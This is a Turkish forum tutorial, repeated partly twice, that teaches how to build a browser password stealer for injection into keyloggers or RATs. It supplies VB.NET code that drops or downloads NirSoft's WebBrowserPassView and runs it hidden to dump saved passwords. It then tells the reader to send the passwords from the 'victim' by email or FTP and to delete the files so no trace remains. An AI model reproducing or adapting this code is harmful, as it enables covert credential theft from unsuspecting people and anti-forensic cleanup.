İyi günler arkadaşlar bugün sizlerle şifre çalıcılar üzerine konuşacağız. Keylogger veya rat'lar süre gelen ve bir opsiyonlu seçenek olan stealer yani şifre çalıcı kodlamasını öğreneceğiz. Vereceğim kaynak kodları inceleyebilir yazacağınız rat veya keylogger'a enjekte edebilir beğenmezseniz anlatımda geçen yöntemi de deneyebilirsiniz.
İlk olarak eskilerin meşhur şifre araçlarını bulunduran Nirsoft Tools'a gidelim ve gerekli araçları indirelim.
Adresimiz :
Daha sonra açılan pencerede Password Tools seçeneği karşımıza çıkacak. Ona tıklayalım ve devam edelim.
Karşımıza çıkan sayfada aşağıda çıkan görselde olduğu gibi "Click this download link." yazan link gömülü butona tıklayalım.
Ben IDM kullandığım için siz kullanmıyorsanız indirme işlemi sırasında size kullanıcı adı ve şifre soracaktır. Kullanıcı adı kısmına download şifre kısmına ise 'nirsoft123!' yazalım ve devam edelim. Dosyalarımız rar şeklinde bilgisayara inecektir. Herhangi bir klasöre çıkaralım.
Buradan istediğiniz şekilde yani adlarından da görüldüğü üzere Firefox için PasswordFox.exe uygulamasını, Chrome için ChromePass.exe uygulamasını tüm tarayıcılar için ise WebBrowserPassView.exe uygulamasını kullanabilirsiniz. Benim tercihim tek tek uğraşmaktansa hepsini bir seferde almak o yüzden WebBrowserPassView uygulaması üzerinden gideceğim ve stealer'imi bunun üzerinden kodlayacağım. İsterseniz siz tek tek de enjekte edebilirsiniz. Bunun için argüman olayını kullanacağım ve bunu ister .bat üzerinden istersek de cmd üzerinden yapabiliriz. Argüman çalıştırma kodumuz yukarıdaki programlar içerisinde şöyle bir veri tablosu;
Örnek kullanım cmd üzerinden;
WebBrowserPassView.exe /stext sifreler.txt
Örnek kullanım bat üzerinden;
start WebBrowserPassView.exe /stext sifreler.txt
Şimdi bunu programımız üzerine enjekte edelim ve teoriler üretelim. Ben vb.net üzerine deneyeceğim sizler hangi dil kullanıyorsanız ona göre uyarlayabilirsiniz. Mesela C# kolayca çevrilebilir.
Resource işlemi üzerinden yapılırsa;
Tool'ümüzü yazacağımız keylogger veya rat'ımıza resource ettik ve bunu ister mail'e istersek FTP yoluyla kurbandan çekelim. Çekerken çıkan tool'ü ve metin belgemizi işlem sonrası iz kalmaması için silelim. Bir textbox oluşturalım ve multiline özelliğini aktifleştirelim, ScrollBars özelliğini Both yapalım. Kodu girelim...
Load olayına ekleyelim;
Artık şifrelerimizi textbox'a çekmemiz gerekli onun için aşağıdaki kodu girelim;
İşlemlerimiz bu kadar artık şifrelerimiz textbox içerisinde. Maile bağlayıp kendinize göndertebilirsiniz. İşlem sonrasında silme kodunu kullanmayı unutmayın.
Resource İşlemini Bilmeyen Arkadaşlar İçin Ufak Bir Kullanım Rehberi;
Resource Kullanmadan Uzaktan İndirme İşlemi İle Yaptıralım;
Herhangi bir dosya yükleme sitesine yükleyelim ben dosyaupload.com sitesini tercih ettim(FTP kullanmanız önerilir). İlk önce tool'ümüzü upload edelim ve işlem bittikten sonra(IDM kullanıyorsanız daha iyi olur.) indir diyelim karşımıza çıkan indirme seçeneğinin üzerinde dosyanın gömülü olduğu adres yer alacaktır bunu kopyalayalım ve indirme kodumuza yapıştıralım. GIF'te görüldüğü üzere;
Şimdi dosya indirme kodunu kullanarak tool'ümüzü harekete geçirelim ve şifrelerimizi forma gönderelim.
İndirme Kodum;
Şifre Çekme Kodum;
Textbox özelliğimiz yukarıdaki bahsettiklerimle aynıdır. Yine işlem sonunda mailimize göndertebiliriz şifreleri beraberinde çevre temizliği yapalım yukarıdaki silme kodunu uygulatalım.
Daha önce kodlanmış olan hazır kaynak kodları altta yorum olarak belirteceğim fazla mesaj yazarsam konuyu bölmek zorunda kalıyor sistem böyle yapmayı uygun gördüm. Yorumlarınız önemlidir. Teşekkürler.
İlk olarak eskilerin meşhur şifre araçlarını bulunduran Nirsoft Tools'a gidelim ve gerekli araçları indirelim.
Adresimiz :
freeware utilities: password recovery, system utilities, desktop utilities - For Windows
Unique collection of freeware desktop utilities, system utilities, password recovery tools, and more
www.nirsoft.net
Daha sonra açılan pencerede Password Tools seçeneği karşımıza çıkacak. Ona tıklayalım ve devam edelim.
/stext dosyaadı.txt | Parola listesini normal bir metin dosyasına kaydedin. |
/stab dosyaadı.txt | Parola listesini sekmeyle ayrılmış bir metin dosyasına kaydedin. |
/scomma dosyaadı.txt | Parola listesini virgülle ayrılmış bir metin dosyasına kaydedin. |
/stabular dosyaadı.txt | Parola listesini bir tablo metin dosyasına kaydedin. |
/shtml dosyaadı.html | Şifre listesini HTML dosyasına kaydedin (Yatay). |
/sverhtml dosyaadı.html | Şifre listesini HTML dosyasına kaydedin (Dikey). |
/sxml dosyaadı.xml | Parola listesini XML dosyasına kaydedin. |
/skeepass dosyaadı | Şifre listesini KeePass csv dosyasına kaydedin. |
/spassexp dosyaadı | Parola listesini Password Exporter Firefox uzantısının XML dosyasına kaydedin. |
- | - |
Örnek kullanım cmd üzerinden;
WebBrowserPassView.exe /stext sifreler.txt
Örnek kullanım bat üzerinden;
start WebBrowserPassView.exe /stext sifreler.txt
Şimdi bunu programımız üzerine enjekte edelim ve teoriler üretelim. Ben vb.net üzerine deneyeceğim sizler hangi dil kullanıyorsanız ona göre uyarlayabilirsiniz. Mesela C# kolayca çevrilebilir.
Resource işlemi üzerinden yapılırsa;
Tool'ümüzü yazacağımız keylogger veya rat'ımıza resource ettik ve bunu ister mail'e istersek FTP yoluyla kurbandan çekelim. Çekerken çıkan tool'ü ve metin belgemizi işlem sonrası iz kalmaması için silelim. Bir textbox oluşturalım ve multiline özelliğini aktifleştirelim, ScrollBars özelliğini Both yapalım. Kodu girelim...
Kod:
Function calici() As String
Dim open As String
Dim Ressource1() As Byte = My.Resources.WebBrowserPassView
FileOpen(1, Environ("tmp") & "\WebBrowserPassView.exe", OpenMode.Binary)
FilePut(1, Ressource1)
FileClose(1)
Shell(Environ("tmp") & "\WebBrowserPassView /stext " & Environ("tmp") & "\data.txt", AppWinStyle.Hide)
open = IO.File.ReadAllText(Environ("tmp") & "\data.txt")
Return open
End Function
Load olayına ekleyelim;
Kod:
Call calici()
Artık şifrelerimizi textbox'a çekmemiz gerekli onun için aşağıdaki kodu girelim;
Kod:
TextBox1.Text = IO.File.ReadAllText(Environ("tmp") & "\data.txt")
İşlemlerimiz bu kadar artık şifrelerimiz textbox içerisinde. Maile bağlayıp kendinize göndertebilirsiniz. İşlem sonrasında silme kodunu kullanmayı unutmayın.
Kod:
My.Computer.FileSystem.DeleteFile(Environ("tmp") & "\data.txt")
My.Computer.FileSystem.DeleteFile(Environ("tmp") & "\WebBrowserPassView.exe")
Resource İşlemini Bilmeyen Arkadaşlar İçin Ufak Bir Kullanım Rehberi;
Resource Kullanmadan Uzaktan İndirme İşlemi İle Yaptıralım;
Herhangi bir dosya yükleme sitesine yükleyelim ben dosyaupload.com sitesini tercih ettim(FTP kullanmanız önerilir). İlk önce tool'ümüzü upload edelim ve işlem bittikten sonra(IDM kullanıyorsanız daha iyi olur.) indir diyelim karşımıza çıkan indirme seçeneğinin üzerinde dosyanın gömülü olduğu adres yer alacaktır bunu kopyalayalım ve indirme kodumuza yapıştıralım. GIF'te görüldüğü üzere;
Şimdi dosya indirme kodunu kullanarak tool'ümüzü harekete geçirelim ve şifrelerimizi forma gönderelim.
İndirme Kodum;
Kod:
My.Computer.Network.DownloadFile("https://dl2.lim1.dosyaupload.com/1q82s/WebBrowserPassView.exe?download_token=3ba207a7468c0a082825736ea0c50a0ce2c878e35291451fe1e2e5d77c546be4", Environ("tmp") & "WebBrowserPassView.exe")
Şifre Çekme Kodum;
Kod:
Shell(Environ("tmp") & "\WebBrowserPassView /stext " & Environ("tmp") & "\data.txt", AppWinStyle.Hide)
Textbox özelliğimiz yukarıdaki bahsettiklerimle aynıdır. Yine işlem sonunda mailimize göndertebiliriz şifreleri beraberinde çevre temizliği yapalım yukarıdaki silme kodunu uygulatalım.
Daha önce kodlanmış olan hazır kaynak kodları altta yorum olarak belirteceğim fazla mesaj yazarsam konuyu bölmek zorunda kalıyor sistem böyle yapmayı uygun gördüm. Yorumlarınız önemlidir. Teşekkürler.
- KONU SONU-